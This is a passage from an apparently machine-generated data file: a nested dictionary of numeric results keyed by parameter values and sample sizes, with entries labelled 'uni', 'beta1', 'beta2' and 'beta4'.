2.4265465242403392]}, 150: {'uni': 0.4319884313883664, 'beta1': 0.2294040890895637, 'beta2': 1.1418184324337164, 'beta4': [0.0571712560341279, 1.961245075770029]}, 100: {'uni': 0.41615600361788385, 'beta1': 0.26525536184211057, 'beta2': 1.079616181101069, 'beta4': [0.056515735143493694, 1.931223027967923]}, 75: {'uni': 0.5236506770132945, 'beta1': 0.4363272030509452, 'beta2': 0.8886165139035214, 'beta4': [0.07388529678184698, 2.1557067095437286]}, 50: {'uni': 0.6456493007017982, 'beta1': 0.2258459736242775, 'beta2': 0.9869185679088074, 'beta4': [0.07918643195511797, 1.769894900611441]}, 30: {'uni': 0.6312440269318761, 'beta1': 0.3874385917123824, 'beta2': 1.0616086354633982, 'beta4': [0.05954207845456959, 1.7604364861764141]}, 20: {'uni': 0.6104126181929235, 'beta1': 0.44559241884185424, 'beta2': 1.0365435872862463, 'beta4': [0.08444149538359204, 1.7089844645029653]}, 10: {'uni': 0.8451737140836733, 'beta1': 0.6917216817713429, 'beta2': 1.1455529117074295, 'beta4': [0.16205765465380548, 1.5093854292414484]}}, 20: {1000: {'uni': 0.8509864153912471, 'beta1': 0.5927515923267968, 'beta2': 1.354526814588536, 'beta4': [0.10563809568972533, 2.780136454569248]}, 750: {'uni': 0.7237563241854266, 'beta1': 0.4880530526732574, 'beta2': 1.3754270885330822, 'beta4': [0.11608747683938342, 2.3901377175273506]}, 500: {'uni': 0.7349098763088299, 'beta1': 0.77443020708596, 'beta2': 1.2995200030374383, 'beta4': [0.08306485481040625, 2.6259561040708594]}, 400: {'uni': 0.7638265439803422, 'beta1': 0.6462529311821992, 'beta2': 1.365105079340537, 'beta4': [0.0805276337368694, 2.9074523976944744]}, 300: {'uni': 0.6816219037194299, 'beta1': 0.9804111288462322, 'beta2': 1.3313766997426972, 'beta4': [0.10612186307108695, 2.3843697448899444]}, 200: {'uni': 0.5998893893985328, 'beta1': 0.5778379418103702, 'beta2': 1.396354902148294, 'beta4': [0.08999830370109724, 2.4110667278922406]}, 150: {'uni': 0.797984421533202, 'beta1': 0.7635119755558982, 'beta2': 1.187222514137199, 'beta4': 
[0.10856175212215503, 2.247413871208628]}, 100: {'uni': 0.8434139646946303, 'beta1': 0.5937542903575364, 'beta2': 1.6481711418029505, 'beta4': [0.10151763893978771, 2.2184136229062994]}, 75: {'uni': 0.7748853594262961, 'beta1': 0.664001314818624, 'beta2': 1.2569773830418571, 'beta4': [0.08736838782029115, 2.443966471445661]}, 50: {'uni': 0.6555728754658805, 'beta1': 0.9684915231136594, 'beta2': 1.2968657616883206, 'beta4': [0.10161338208896606, 2.182760554868553]}, 30: {'uni': 0.7083642351575556, 'beta1': 0.6515567893677615, 'beta2': 1.5238104034879336, 'beta4': [0.0947380293078371, 2.1689469958482914]}, 20: {'uni': 0.7698390858433307, 'beta1': 0.475054994726419, 'beta2': 1.2097144464959995, 'beta4': [0.1081789146585546, 1.9020833213197117]}, 10: {'uni': 0.7904674928158877, 'beta1': 0.949332463180755, 'beta2': 1.2485380080685293, 'beta4': [0.16929713985789144, 1.7918637142720673]}}, 10: {1000: {'uni': 2.020480490053906, 'beta1': 7.10721041709354, 'beta2': 2.5389968592417067, 'beta4': [0.18067848144370124, 4.323777699457079]}, 750: {'uni': 1.8352667947476462, 'beta1': 2.6434476210102633, 'beta2': 2.2530690225728245, 'beta4': [0.1947084612587166, 5.370382453225991]}, 500: {'uni': 3.4985999712865055, 'beta1': 2.6981020235784237, 'beta2': 2.7496782818831824, 'beta4': [0.17891534759810027, 4.506976439308247]}, 400: {'uni': 1.833890959291033, 'beta1': 3.4840986435598715, 'beta2': 2.6642714750900427, 'beta4': [0.2058070804280337, 6.517500096750502]}, 300: {'uni': 2.0147647645387217, 'beta1': 2.7229813555334967, 'beta2': 4.346111089370431, 'beta4': [0.1782410384933214, 4.701824532323007]}, 200: {'uni': 1.7663283518203157, 'beta1': 3.11879869260279, 'beta2': 2.540152495390496, 'beta4': [0.2166114012627128, 4.820017824394071]}, 150: {'uni': 2.0095640832399875, 'beta1': 2.9419595624093864, 'beta2': 2.724688157226053, 'beta4': [0.17215587940898358, 4.66355299910067]}, 100: {'uni': 2.4042834119544807, 'beta1': 2.352950768311206, 'beta2': 2.2814604833627694, 'beta4': 
[0.18527457231348213, 4.377326443901522]}, 75: {'uni': 2.716863274826222, 'beta1': 4.822313759516299, 'beta2': 2.6674769462538004, 'beta4': [0.21543589699842206, 4.108384140007609]}, 50: {'uni': 2.2468730444488623, 'beta1': 3.483152730839255, 'beta2': 2.568146356363349, 'beta4': [0.16002210596292038, 5.625984340312313]}, 30: {'uni': 2.3701381561805053, 'beta1': 3.3219273109798197, 'beta2': 3.9081160898211027, 'beta4': [0.21947288024784048, 3.484919952253338]}, 20: {'uni': 2.106479401491252, 'beta1': 3.476826223442542, 'beta2': 2.6443039958807697, 'beta4': [0.1931791291006743, 3.2904139525762433]}, 10: {'uni': 1.7163313859785951, 'beta1': 3.4176017442346387, 'beta2': 2.1443609804377814, 'beta4': [0.202020846365801, 3.0372515442974857]}}}, 0.005: {1000: {1000: {'uni': 0.014328099280717366, 'beta1': 0.0004919534897684268, 'beta2': 0.26507968432654655, 'beta4': [0.001982857431591232, 1.071207340663885]}, 750: {'uni': 0.014645931102658792, 'beta1': 0.0004516767324158777, 'beta2': 0.28135025385035284, 'beta4': [0.0023819938907576168, 1.0710979644235907]}, 500: {'uni': 0.0401999123504932, 'beta1': 0.0010098622206039503, 'beta2': 0.26087040771294423, 'beta4': [0.00391322292956706, 1.0602707743351634]}, 400: {'uni': 0.03859906062661561, 'beta1': 0.0023951491974352618, 'beta2': 0.325410845646177, 'beta4': [0.00431194717597686, 1.0539406068541854]}, 300: {'uni': 0.03961135602832819, 'beta1': 0.004463024128966381, 'beta2': 0.30654953459515155, 'beta4': [0.005887885874932361, 1.0495105539340337]}, 200: {'uni': 0.05328322862904386, 'beta1': 0.00695816954383936, 'beta2': 0.3584887819400396, 'beta4': [0.010031906426799495, 1.0394763617108735]}, 150: {'uni': 0.07991070685839313, 'beta1': 0.01096956639776533, 'beta2': 0.38432269776431915, 'beta4': [0.014212643491827315, 1.035714483334916]}, 100: {'uni': 0.11547898783798272, 'beta1': 0.024911803431916877, 'beta2': 0.4413911056397121, 'beta4': [0.020223936999933474, 1.0295365432573114]}, 75: {'uni': 0.14278860827610332, 'beta1': 
0.04111931346005935, 'beta2': 0.48247323124440955, 'beta4': [0.024508730748380864, 1.028521101035791]}, 50: {'uni': 0.22244005356502672, 'beta1': 0.10076678543802904, 'beta2': 0.53887818521626, 'beta4': [0.04406731062769291, 1.0253494243999786]}, 30: {'uni': 0.3457199293022066, 'beta1': 0.18111907291977847, 'beta2': 0.6489180152254685, 'beta4': [0.06329946927410347, 1.0186691429238954]}, 20: {'uni': 0.4321639624206314, 'beta1': 0.31930093433284834, 'beta2': 0.6968358057547454, 'beta4': [0.08748917387005273, 1.0148628000802158]}, 10: {'uni': 0.7535607617244571, 'beta1': 0.6459185759652024, 'beta2': 0.8404608212786704, 'beta4': [0.14874100748788613, 1.0103627959113197]}}, 750: {1000: {'uni': 0.016054643834592864, 'beta1': 0.0005255210796136057, 'beta2': 0.29613016022578065, 'beta4': [0.002569321458361536, 1.0921977757609453]}, 750: {'uni': 0.017565449609493463, 'beta1': 0.00044128146494429657, 'beta2': 0.32596319569610427, 'beta4': [0.0024211193229798614, 1.0837247325988582]}, 500: {'uni': 0.025273388585714537, 'beta1': 0.0012238909965949832, 'beta2': 0.28596633888810613, 'beta4': [0.004706891079404562, 1.0763363258243404]}, 400: {'uni': 0.0284869706662805, 'beta1': 0.003373431089387849, 'beta2': 0.31160773879605275, 'beta4': [0.004778217415687074, 1.0688815827153706]}, 300: {'uni': 0.051974911880818334, 'beta1': 0.0025953674653235816, 'beta2': 0.35487660596973497, 'beta4': [0.0057040189841521954, 1.0645206895209334]}, 200: {'uni': 0.057787227888696155, 'beta1': 0.008594698361171204, 'beta2': 0.33464364516433065, 'beta4': [0.008915943193690542, 1.058535030341485]}, 150: {'uni': 0.1072577046248855, 'beta1': 0.008954930631785816, 'beta2': 0.3547962531903187, 'beta4': [0.014926190566390659, 1.0451050889459255]}, 100: {'uni': 0.10866795713543598, 'beta1': 0.021365150417910553, 'beta2': 0.408057891802109, 'beta4': [0.01995689778854479, 1.0427691805903552]}, 75: {'uni': 0.1515930948295423, 'beta1': 0.0471416864069456, 'beta2': 0.4622290961298072, 'beta4': 
[0.033113111249531646, 1.0347147013802995]}, 50: {'uni': 0.22238209797127031, 'beta1': 0.09411440367183642, 'beta2': 0.5492704161662795, 'beta4': [0.04003882098404763, 1.03710679974761]}, 30: {'uni': 0.36495749036912684, 'beta1': 0.20588432683378366, 'beta2': 0.63948653203891, 'beta4': [0.053653553378636976, 1.0243617060340924]}, 20: {'uni': 0.4884959323661349, 'beta1': 0.30666472361293534, 'beta2': 0.7081435215673421, 'beta4': [0.07540684280791501, 1.020569046057047]}, 10: {'uni': 0.6968386619986449, 'beta1': 0.6811799241679843, 'beta2': 0.8553586319565165, 'beta4': [0.15249709600683814, 1.0142223850662149]}}, 500: {1000: {'uni': 0.02390920295425466, 'beta1': 0.0010562525829358833, 'beta2': 0.28768678189795666, 'beta4': [0.004312024387535537, 1.1489861120864775]}, 750: {'uni': 0.02364967452116205, 'beta1': 0.0013663794051884156, 'beta2': 0.3059833791245982, 'beta4': [0.0037397623064582357, 1.125354161378425]}, 500: {'uni': 0.027171446923213848, 'beta1': 0.0014895968977017358, 'beta2': 0.32175550025195343, 'beta4': [0.004058092086363399, 1.1107301691353542]}, 400: {'uni': 0.03183194238950928, 'beta1': 0.0020434543150262266, 'beta2': 0.31271219509470577, 'beta4': [0.004795694763576324, 1.1285307153481872]}, 300: {'uni': 0.03915870533550215, 'beta1': 0.002891114208307802, 'beta2': 0.3374659826961455, 'beta4': [0.009481642046035186, 1.1000575313033538]}, 200: {'uni': 0.05918013749289809, 'beta1': 0.00571396543076984, 'beta2': 0.3642424794285678, 'beta4': [0.008165969887847468, 1.0779103780685995]}, 150: {'uni': 0.08913468389043425, 'beta1': 0.013857796694830497, 'beta2': 0.36670305795462654, 'beta4': [0.013510229542809978, 1.0704422729330318]}, 100: {'uni': 0.10962684237002224, 'beta1': 0.025601470186866964, 'beta2': 0.41964378122965873, 'beta4': [0.02140079956143495, 1.0615497788178276]}, 75: {'uni': 0.16410321919833215, 'beta1': 0.036565104170381946, 'beta2': 0.4483370318574912, 'beta4': [0.025341038030251152, 1.0519482474243165]}, 50: {'uni': 0.23214158365024107, 
'beta1': 0.07759808681388385, 'beta2': 0.5409699810844546, 'beta4': [0.03698440051989314, 1.045002808918023]}, 30: {'uni': 0.36866261035341547, 'beta1': 0.1615745284530632, 'beta2': 0.6000774443252743, 'beta4': [0.06503567790681813, 1.036549927349429]}, 20: {'uni': 0.5142807096062043, 'beta1': 0.3709377892635338, 'beta2': 0.6687577103009485, 'beta4': [0.09190174832036048, 1.0294336844120058]}, 10: {'uni': 0.6676276934998603, 'beta1': 0.6031823674458175, 'beta2': 0.8504156545798995, 'beta4': [0.15410271127453445, 1.0248849403515385]}}, 400: {1000: {'uni': 0.02893756653890583, 'beta1': 0.0024708098532196816, 'beta2': 0.35317007637931086, 'beta4': [0.005840162737584066, 1.1458782759009223]}, 750: {'uni': 0.029772953579492705, 'beta1': 0.0025813101021306246, 'beta2': 0.33581836617716804, 'beta4': [0.00515663755940367, 1.1544432713432045]}, 500: {'uni': 0.026373683744683594, 'beta1': 0.0012817539679130607, 'beta2': 0.3206528709629913, 'beta4': [0.006340143273613668, 1.1259949309060133]}, 400: {'uni': 0.028870605255494165, 'beta1': 0.0017583836928871455, 'beta2': 0.3345485197465399, 'beta4': [0.0049145410619623065, 1.1313262140962277]}, 300: {'uni': 0.037631574659545766, 'beta1': 0.003314104667762801, 'beta2': 0.3739031457830798, 'beta4': [0.006628311781369157, 1.1244848630571982]}, 200: {'uni': 0.05818960792147371, 'beta1': 0.006414447500778574, 'beta2': 0.34785104123458455, 'beta4': [0.010347124650326254, 1.1055988963642294]}, 150: {'uni': 0.06686629124379927, 'beta1': 0.010473443536135857, 'beta2': 0.3711187401000779, 'beta4': [0.01737674940997798, 1.0894763594747867]}, 100: {'uni': 0.11042615577766349, 'beta1': 0.021440842781902242, 'beta2': 0.4194431482280291, 'beta4': [0.020167807881497756, 1.0720999951903198]}, 75: {'uni': 0.17234535024501574, 'beta1': 0.04888178853521142, 'beta2': 0.44258791900978556, 'beta4': [0.024666584013382783, 1.0724976966026734]}, 50: {'uni': 0.20747390135121996, 'beta1': 0.10412610029786912, 'beta2': 0.5214455501618365, 'beta4': 
[0.03647333118409969, 1.054845362239509]}, 30: {'uni': 0.323080761682041, 'beta1': 0.1910703286553347, 'beta2': 0.5895460490280188, 'beta4': [0.07318268072463806, 1.047335158479478]}, 20: {'uni': 0.425104439432341, 'beta1': 0.31288400955871687, 'beta2': 0.660810228645866, 'beta4': [0.09528909385922078, 1.0367863357961702]}, 10: {'uni': 0.7978419703610078, 'beta1': 0.6535599792905803, 'beta2': 0.8606946260002006, 'beta4': [0.1559615213065441, 1.0262921049491547]}}, 300: {1000: {'uni': 0.03617128520734348, 'beta1': 0.005295932115668975, 'beta2': 0.3953652729378721, 'beta4': [0.0077996963164763365, 1.198423568016775]}, 750: {'uni': 0.03370212655005886, 'beta1': 0.003406479786029501, 'beta2': 0.33283985486640805, 'beta4': [0.006246338063993741, 1.1688992556321924]}, 500: {'uni': 0.03733598381117172, 'beta1': 0.002690213582744608, 'beta2': 0.32679970881106063, 'beta4': [0.0072746227056809725, 1.1815977716399453]}, 400: {'uni': 0.037609473359047664, 'beta1': 0.0030367027449007575, 'beta2': 0.31301244809282824, 'beta4': [0.007004909388070732, 1.1535355373438279]}, 300: {'uni': 0.04866436408185673, 'beta1': 0.005036968714659069, 'beta2': 0.39337778376104543, 'beta4': [0.006593818546016198, 1.1471357754823057]}, 200: {'uni': 0.06691519284441158, 'beta1': 0.012088429889848653, 'beta2': 0.411545693440886, 'beta4': [0.00925915149648542, 1.1467683642662987]}, 150: {'uni': 0.08013870806087241, 'beta1': 0.012928591505765686, 'beta2': 0.3639915988699613, 'beta4': [0.013545098748925637, 1.112941475607728]}, 100: {'uni': 0.11915204806596211, 'beta1': 0.020560796608724338, 'beta2': 0.43513333320171427, 'beta4': [0.024870502434082297, 1.101010773135631]}, 75: {'uni': 0.15380764367109265, 'beta1': 0.052743721971365606, 'beta2': 0.477437577043614, 'beta4': [0.025753188654213978, 1.096656178793653]}, 50: {'uni': 0.21634860989228755, 'beta1': 0.10387426914262873, 'beta2': 0.5267676741342504, 'beta4': [0.0336359638147702, 1.0756656338476558]}, 30: {'uni': 0.329104913600056, 'beta1': 
0.2119333657379465, 'beta2': 0.5795669522760784, 'beta4': [0.05880821427631558, 1.0573282739845435]}, 20: {'uni': 0.4440546212288396, 'beta1': 0.33225105400565214, 'beta2': 0.7033791372197638, 'beta4': [0.09446679633215929, 1.0452682420079284]}, 10: {'uni': 0.6700468460734627, 'beta1': 0.6423991037463385, 'beta2': 0.8209898707066139, 'beta4': [0.14614716121509172, 1.0368350386240601]}}, 200: {1000: {'uni': 0.055678760865024414, 'beta1': 0.007958611327107352, 'beta2': 0.3616812080853317, 'beta4': [0.009650760728049683, 1.2737715811614496]}, 750: {'uni': 0.06253429328064883, 'beta1': 0.007052014486479158, 'beta2': 0.3727602445915611, 'beta4': [0.013907566868759703, 1.2455156544743298]}, 500: {'uni': 0.056629728333709814, 'beta1': 0.007236990383308722, 'beta2': 0.4378412955709138, 'beta4': [0.008915720861055711, 1.2396638343497217]}, 400: {'uni': 0.06557818408133465, 'beta1': 0.008559725754195417, 'beta2': 0.4022416830536871, 'beta4': [0.008720624487697483, 1.2242496161641432]}, 300: {'uni': 0.055653765135356484, 'beta1': 0.010716858079046102, 'beta2': 0.40777043770500154, 'beta4': [0.013037868268656936, 1.1945048646946044]}, 200: {'uni': 0.07406809444327488, 'beta1': 0.00871994028403354, 'beta2': 0.43397543608537975, 'beta4': [0.010133665874696609, 1.183136623171022]}, 150: {'uni': 0.07579453587538967, 'beta1': 0.016690794496607576, 'beta2': 0.38707637478822926, 'beta4': [0.012003777291769832, 1.1607492057108946]}, 100: {'uni': 0.1330117692754952, 'beta1': 0.0273137396681669, 'beta2': 0.4639958863729501, 'beta4': [0.01718866277831865, 1.1529289387642288]}, 75: {'uni': 0.16284219430179553, 'beta1': 0.05374597722028761, 'beta2': 0.46276207823889204, 'beta4': [0.0212354062721255, 1.1433215554102738]}, 50: {'uni': 0.21676977749720733, 'beta1': 0.10705646819292171, 'beta2': 0.4962386395407797, 'beta4': [0.0424490148625437, 1.106642687778397]}, 30: {'uni': 0.3232291639799789, 'beta1': 0.21990639926403363, 'beta2': 0.6287500118287891, 'beta4': [0.06227333917623599, 
1.0852347913639224]}, 20: {'uni': 0.4741588995975893, 'beta1': 0.3180055211757256, 'beta2': 0.6997497503888488, 'beta4': [0.08910550204088843, 1.073553657215182]}, 10: {'uni': 0.7060034832794384, 'beta1': 0.7535719832598702, 'beta2': 0.836970960678481, 'beta4': [0.15463124862968708, 1.061123889701544]}}, 150: {1000: {'uni': 0.09755029708902496, 'beta1': 0.013371380424273176, 'beta2': 0.4904883791446505, 'beta4': [0.014485120313771681, 1.3263298856392054]}, 750: {'uni': 0.07935627239599896, 'beta1': 0.014498726584143962, 'beta2': 0.4032213903162674, 'beta4': [0.01453548924940545, 1.312319935889472]}, 500: {'uni': 0.07940335531678129, 'beta1': 0.013532193951838856, 'beta2': 0.43737767914012077, 'beta4': [0.012086410300407132, 1.292089639338192]}, 400: {'uni': 0.08510558470918518, 'beta1': 0.013814146505550512, 'beta2': 0.4322597292778953, 'beta4': [0.011514722775333443, 1.2679672672520583]}, 300: {'uni': 0.07050546141892267, 'beta1': 0.013721651466435995, 'beta2': 0.4772443440959037, 'beta4': [0.013048563921660452, 1.275168506879035]}, 200: {'uni': 0.07212522306921464, 'beta1': 0.014794794920315857, 'beta2': 0.4182389641782459, 'beta4': [0.012330051449758477, 1.223055546001289]}, 150: {'uni': 0.0880530466181019, 'beta1': 0.01637038391386567, 'beta2': 0.4016620386283008, 'beta4': [0.015981031730102176, 1.2058441135701794]}, 100: {'uni': 0.10437092139348636, 'beta1': 0.042125959393999324, 'beta2': 0.4180395651716391, 'beta4': [0.018238525075653742, 1.1892200376979478]}, 75: {'uni': 0.1354097789470845, 'beta1': 0.04466340448885708, 'beta2': 0.4719502510414126, 'beta4': [0.029031453045082974, 1.1842822424503554]}, 50: {'uni': 0.2321223950706905, 'beta1': 0.1000673436975513, 'beta2': 0.5419923580903283, 'beta4': [0.04560941534187873, 1.1404594681712081]}, 30: {'uni': 0.3398043685756915, 'beta1': 0.20164768345364828, 'beta2': 0.5973341709232525, 'beta4': [0.05850641234359622, 1.1190533719391869]}, 20: {'uni': 0.42530652623250753, 'beta1': 0.33972887071420993, 'beta2': 
0.6661734761601139, 'beta4': [0.0866818884666435, 1.1036146702573584]}, 10: {'uni': 0.7206486942031576, 'beta1': 0.6682818489256517, 'beta2': 0.8203819752573837, 'beta4': [0.1457856061570244, 1.0782841756806698]}}, 100: {1000: {'uni': 0.12225970876711711, 'beta1': 0.026865924786776484, 'beta2': 0.5481932843224591, 'beta4': [0.021249975024392645, 1.4458803198625023]}, 750: {'uni': 0.10432288378851975, 'beta1': 0.01938410759360099, 'beta2': 0.5174008910203534, 'beta4': [0.020650675251219643, 1.400096753320331]}, 500: {'uni': 0.10980786444942221, 'beta1': 0.046045147980126745, 'beta2': 0.4872619282673519, 'beta4': [0.020216014505271482, 1.34415766866211]}, 400: {'uni': 0.11830943122090917, 'beta1': 0.022610702506398205, 'beta2': 0.48432204455605576, 'beta4': [0.020746831022585423, 1.3579130782794564]}, 300: {'uni': 0.1301564606268183, 'beta1': 0.03017686908257779, 'beta2': 0.49504127235180784, 'beta4': [0.017718462476249502, 1.3626289526025477]}, 200: {'uni': 0.10317650157447253, 'beta1': 0.031018838197086084, 'beta2': 0.5827841182143911, 'beta4': [0.01835643401415011, 1.3438136723439953]}, 150: {'uni': 0.1223846100192758, 'beta1': 0.029879335127678274, 'beta2': 0.5409671366968559, 'beta4': [0.01954089865119265, 1.368437090606529]}, 100: {'uni': 0.12961477120291165, 'beta1': 0.03162701397748519, 'beta2': 0.5639520142257836, 'beta4': [0.017002122681775672, 1.3145981538380391]}, 75: {'uni': 0.17353671304347995, 'beta1': 0.047537565730464616, 'beta2': 0.5761043512638573, 'beta4': [0.027716532256132305, 1.2441854959216505]}, 50: {'uni': 0.24826276887242338, 'beta1': 0.08558962844244324, 'beta2': 0.533915471627432, 'beta4': [0.03863914801170205, 1.218517497159898]}, 30: {'uni': 0.37180952980211535, 'beta1': 0.21095614373881763, 'beta2': 0.6001047101242712, 'beta4': [0.055670631983699946, 1.2205675047970168]}, 20: {'uni': 0.5332463734790038, 'beta1': 0.3122699052968921, 'beta2': 0.6825479362346901, 'beta4': [0.1007635027564815, 1.1578526542019671]}, 10: {'uni': 
0.7827438334815844, 'beta1': 0.667689009954351, 'beta2': 0.8475596342444666, 'beta4': [0.14486763242884407, 1.141064060957981]}}, 75: {1000: {'uni': 0.13934776917850505, 'beta1': 0.03613172510974446, 'beta2': 0.5412943561883247, 'beta4': [0.027239243280109772, 1.4730726636218179]}, 750: {'uni': 0.16768552393257194, 'beta1': 0.04411635102462327, 'beta2': 0.5665863137587445, 'beta4': [0.026435978717218058, 1.50426942823365]}, 500: {'uni': 0.24455944319130382, 'beta1': 0.05406680626221278, 'beta2': 0.5394359340277001, 'beta4': [0.027135290145289204, 1.5051667579504118]}, 400: {'uni': 0.15461074078236603, 'beta1': 0.05661127214288521, 'beta2': 0.5887256535284988, 'beta4': [0.03600603252919621, 1.478513973879563]}, 300: {'uni': 0.1920855608409181, 'beta1': 0.03925990146874738, 'beta2': 0.630763663206618, 'beta4': [0.025894458672085747, 1.4794655207279226]}, 200: {'uni': 0.1591107285954601, 'beta1': 0.04254459738815162, 'beta2': 0.6307198306870676, 'beta4': [0.02985877018033198, 1.530765493767434]}, 150: {'uni': 0.14590438734222005, 'beta1': 0.04466619164761486, 'beta2': 0.6173909230664805, 'beta4': [0.026438835998575785, 1.5522769250395467]}, 100: {'uni': 0.16386720848409753, 'beta1': 0.034581214946180605, 'beta2': 0.6435260478502861, 'beta4': [0.02156809827287651, 1.3310952312116713]}, 75: {'uni': 0.2051974936490455, 'beta1': 0.04438683443429087, 'beta2': 0.7570265710330468, 'beta4': [0.02519624884405606, 1.3151982531497861]}, 50: {'uni': 0.24755928104164165, 'beta1': 0.07941075920923452, 'beta2': 0.5523721622394626, 'beta4': [0.032146481769480144, 1.3112402606407734]}, 30: {'uni': 0.31261585515906276, 'beta1': 0.18074582175361859, 'beta2': 0.7859291996037391, 'beta4': [0.06990167942655667, 1.2489639807507744]}, 20: {'uni': 0.47757757711804133, 'beta1': 0.3892655220378294, 'beta2': 0.65429188208398, 'beta4': [0.07124185190053445, 1.20898602562413]}, 10: {'uni': 0.758938135412502, 'beta1': 0.6071917038027647, 'beta2': 0.8133960727391841, 'beta4': [0.1418543707432124, 
1.172110809011133]}}, 50: {1000: {'uni': 0.2519872356069227, 'beta1': 0.09956789513840078, 'beta2': 0.5973602366915676, 'beta4': [0.03557118792760849, 1.846420958350958]}, 750: {'uni': 0.22274951858723938, 'beta1': 0.14482781845510667, 'beta2': 0.6178955775749804, 'beta4': [0.03823593411101681, 1.6198382539682874]}, 500: {'uni': 0.28071600405504815, 'beta1': 0.09158498231032232, 'beta2': 0.7997535279942787, 'beta4': [0.04163171710115897, 1.650963554921299]}, 400: {'uni': 0.2922089526616882, 'beta1': 0.11759396626445189, 'beta2': 0.7731995739049791, 'beta4': [0.037647902544816, 1.7656229411142739]}, 300: {'uni': 0.25418399430527083, 'beta1': 0.13751569298349953, 'beta2': 0.7573774424984173, 'beta4': [0.05931918746259869, 1.7791282172821952]}, 200: {'uni': 0.23531715081630106, 'beta1': 0.11068962000304736, 'beta2': 0.6622845585879117, 'beta4': [0.03585546142253086, 1.6847743436735174]}, 150: {'uni': 0.2571656578305455, 'beta1': 0.0990487380070637, 'beta2': 0.9408378093466124, 'beta4': [0.04508196722079799, 1.6238817123606337]}, 100: {'uni': 0.30195245498224216, 'beta1': 0.12530632794125562, 'beta2': 0.791776346980489, 'beta4': [0.03925044382813762, 1.4734408851271226]}, 75: {'uni': 0.22035812392432402, 'beta1': 0.07800979369300794, 'beta2': 0.842860198671106, 'beta4': [0.03637344064264452, 1.549853109016985]}, 50: {'uni': 0.22701572090938457, 'beta1': 0.09633906028439704, 'beta2': 0.7417429467761041, 'beta4': [0.03967152130862653, 1.4208398087842706]}, 30: {'uni': 0.34305046792602056, 'beta1': 0.19457807203493765, 'beta2': 0.7688470256335644, 'beta4': [0.054957912588768955, 1.360607831613779]}, 20: {'uni': 0.44028196804498093, 'beta1': 0.3293466137962002, 'beta2': 0.8955070612796764, 'beta4': [0.08742726496427163, 1.3095948825783168]}, 10: {'uni': 0.7699134066893929, 'beta1': 0.6638012059398908, 'beta2': 0.8293763559338202, 'beta4': [0.16302206868052743, 1.255835042638528]}}, 30: {1000: {'uni': 0.3783603182203987, 'beta1': 0.2985135916574845, 'beta2': 
0.8480133889666746, 'beta4': [0.07400878504174886, 1.8720458507484417]}, 750: {'uni': 0.4154933226222209, 'beta1': 0.24934139997421964, 'beta2': 1.160778307881534, 'beta4': [0.07685054947159019, 2.044210757725545]}, 500: {'uni': 0.550909588495024, 'beta1': 0.2313146347432924, 'beta2': 0.936385734064073, 'beta4': [0.07048754696750378, 1.9792386217682503]}, 400: {'uni': 0.5076547857886943, 'beta1': 0.32364070076843526, 'beta2': 0.828794665169518, 'beta4': [0.05552868809465391, 2.13369982878608]}, 300: {'uni': 0.4212091415576435, 'beta1': 0.6407736056430736, 'beta2': 1.0918478367941438, 'beta4': [0.06705773137193753, 2.183556190312245]}, 200: {'uni': 0.5222535142935859, 'beta1': 0.25665396488998615, 'beta2': 0.9107840939614209, 'beta4': [0.06654571092334242, 1.805631337994444]}, 150: {'uni': 0.43316941974778084, 'beta1': 0.20792026635549665, 'beta2': 0.9315624660996159, 'beta4': [0.08392298669805384, 1.8279786709160393]}, 100: {'uni': 0.4390903940116475, 'beta1': 0.23112811858430285, 'beta2': 1.1529115982571578, 'beta4': [0.06978068315817124, 1.991075733195905]}, 75: {'uni': 0.4108132941809196, 'beta1': 0.3623491730750028, 'beta2': 0.987753882594803, 'beta4': [0.06674754238444675, 1.840030509070244]}, 50: {'uni': 0.43236438562108004, 'beta1': 0.26646388556150524, 'beta2': 1.1050012918364582, 'beta4': [0.07546899560971876, 1.7970124808313264]}, 30: {'uni': 0.48845354994614554, 'beta1': 0.2512856894263626, 'beta2': 1.0020051752860113, 'beta4': [0.05853483814283524, 1.6209383322431605]}, 20: {'uni': 0.46205240371135886, 'beta1': 0.33039091692066247, 'beta2': 0.8763727543362038, 'beta4': [0.08506956671611077, 1.6253602089503376]}, 10: {'uni': 0.7376491727942917, 'beta1': 0.701426624157432, 'beta2': 1.0318845897107891, 'beta4': [0.16199617337961164, 1.4429581649223886]}}, 20: {1000: {'uni': 0.8019976350067, 'beta1': 0.8332259715318519, 'beta2': 1.1366607302655636, 'beta4': [0.08995158287931063, 2.523474384380298]}, 750: {'uni': 0.8240765825127023, 'beta1': 
0.6078699965037111, 'beta2': 1.3066093350540289, 'beta4': [0.09399747363931381, 2.5986801791624394]}, 500: {'uni': 0.9974083513430438, 'beta1': 0.5023448507895341, 'beta2': 1.5764142648731303, 'beta4': [0.08892101043100277, 2.4498259406795078]}, 400: {'uni': 0.65987087499712, 'beta1': 1.0021947304857353, 'beta2': 1.0133412632320413, 'beta4': [0.09297169783242988, 2.203514161015423]}, 300: {'uni': 0.8346407450005573, 'beta1': 0.4858229844832691, 'beta2': 1.7026411990816142, 'beta4': [0.09176193095098974, 2.4706819211929543]}, 200: {'uni': 0.6097035714025173, 'beta1': 0.5346254040464333, 'beta2': 1.316817789777299, 'beta4': [0.09682457806892368, 2.242178483680891]}, 150: {'uni': 0.7118891887622544, 'beta1': 0.73757966982389, 'beta2': 1.756042304492378, 'beta4': [0.09424018725867234, 2.456661404213161]}, 100: {'uni': 0.7037802965100136, 'beta1': 1.3606834631757059, 'beta2': 1.3043054700351289, 'beta4': [0.10217585159933665, 2.3827792567388353]}, 75: {'uni': 0.8055662843703303, 'beta1': 0.46287340020535195, 'beta2': 1.2503612065373881, 'beta4': [0.10490481871712838, 2.816915331499867]}, 50: {'uni': 0.8246742261483321, 'beta1': 0.6187824029797957, 'beta2': 1.3150729181082033, 'beta4': [0.08275958000501926, 2.42227261187819]}, 30: {'uni': 0.6868898977184308, 'beta1': 0.40962747269539135, 'beta2': 1.3439023117013336, 'beta4': [0.10164499360892393, 1.9097766052880618]}, 20: {'uni': 0.554678594337485, 'beta1': 0.5266918425509246, 'beta2': 1.3548613513588386, 'beta4': [0.10398481149694526, 1.9876903951414775]}, 10: {'uni': 1.0446131131368517, 'beta1': 0.7747696875546464, 'beta2': 1.8108754189944798, 'beta4': [0.15817077417264236, 1.7127206843317608]}}, 10: {1000: {'uni': 1.6849860990985794, 'beta1': 2.7439137403319105, 'beta2': 2.734111069331994, 'beta4': [0.18923271560035437, 5.02925901860904]}, 750: {'uni': 1.830761737169992, 'beta1': 2.5751354681579217, 'beta2': 2.663574129357734, 'beta4': [0.16303669261193782, 3.6181870370037714]}, 500: {'uni': 3.2685644351081553, 
